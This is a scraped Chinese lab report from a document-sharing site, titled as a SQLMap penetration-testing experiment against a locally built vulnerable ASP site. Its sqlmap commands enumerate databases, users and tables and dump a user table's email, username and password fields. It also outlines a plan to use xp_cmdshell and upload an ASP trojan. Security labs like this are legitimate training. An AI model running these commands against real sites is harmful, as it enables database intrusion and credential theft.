版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、麟 継 笔 记实验三 渗透攻击工具测试 (SQLMap)一、注入简介SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查
2、看S日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,日前支持的数据库是MS-SQL,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。sqlmap的功能强大到让你
3、惊叹,常规注入工具不能绕过的话,终极使用sqlmap会有意想不到的效果。二、实验简介测试环境:本地搭建的具有sql注入点的网站 50注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。总体思路:·发现SQL注入位置;·判断后台数据库类型;·确定XP_CMDSHELL可执行情况·发现WEB虚拟目录·上传ASP木马;·得到管理员权限;三、测试(一)检测注入点是否可用plain view plain copy1
4、. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134"参数:-u:指定注入点url结果:注入结果展示:(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。(2)web服务器系统为windows 2003 or XP(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0(4)数据库类型为:
5、SQLSERVER 2000其中图一有若干询问语句,需要用户输入Y/N,如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -batch (二)暴库一条命令即可曝出该sqlserver中所有数据库名称,命令如下:plain view plain&
6、#160;copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -dbs 参数:-dbs:dbs前面有两条杠,请看清楚。结果:结果显示该sqlserver中共包含7个可用的数据库。(三)web当前使用的数据库plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u &quo
7、t;50/products.asp?id=134" -current-db (四)web数据库使用账户plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -current-user (五)列出sqlserver所有用户plain view plain&
8、#160;copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -users (六)数据库账户与密码plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -
9、passwords (七)列出数据库中的表plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -D tourdata -tables 参数:-D:指定数据库名称-tables:列出表结果:结果体现共列出了34张表。(八)列出表中字段plain view plain copy1
10、. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -D tourdata -T userb -columns 参数:-D:指定数据库名称-T:指定要列出字段的表-columns:指定列出字段结果:结果显示该userb表中包含了23条字段。(九)暴字段内容plain view plain copy1. C:Python27sqlmap>
11、;python sqlmap.py -u "50/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" -dump 参数:-C :指定要暴的字段-dump:将结果导出结果:如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:plain view plain co
12、py1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" -start 1 -stop 10 -dump 参数:-start:指定开始的行-stop:指定结束的行此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。结果如下:(十)验证结
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025版高考英语一轮总复习第一部分模块知识复习必修第二册Unit5Music
- 北京市房山区2024-2025学年高三语文上学期期末考试试卷
- 2024年度汽车贷款融资租赁合同模板(汽车金融业务拓展)3篇
- 湖南省益阳市资阳区九年级化学下册 第十二单元 课题2 化学元素与人体健康教学实录 新人教版
- 2024年标准版矿场开采承包协议版
- 第16课《奖励一下自己》第2课时 教学实录-2023-2024学年道德与法治二年级下册统编版
- 2024年度人才招聘与选拔专项协议3篇
- 2024年度技术服务合同:云计算平台搭建与维护15篇
- 出租车公司租赁合同
- 2024年城市绿化工程碎石材料供应与销售协议书2篇
- 一年级数学20以内计算练习凑十法、破十法、借十法、平十法
- 中国痔病诊疗指南(2020版)
- 创办精神病医院申请
- 国际标准《风险管理指南》(ISO31000)的中文版
- (完整版)外研版高中英语必修三单词表(带音标)
- MOOC 国际商务-暨南大学 中国大学慕课答案
- 特征值与特征向量
- 作家协会2024年下半年工作计划3篇
- 2024征信考试题库(含答案)
- 个人理财(西安欧亚学院)智慧树知到期末考试答案2024年
- pc(装配式)结构施工监理实施细则
评论
0/150
提交评论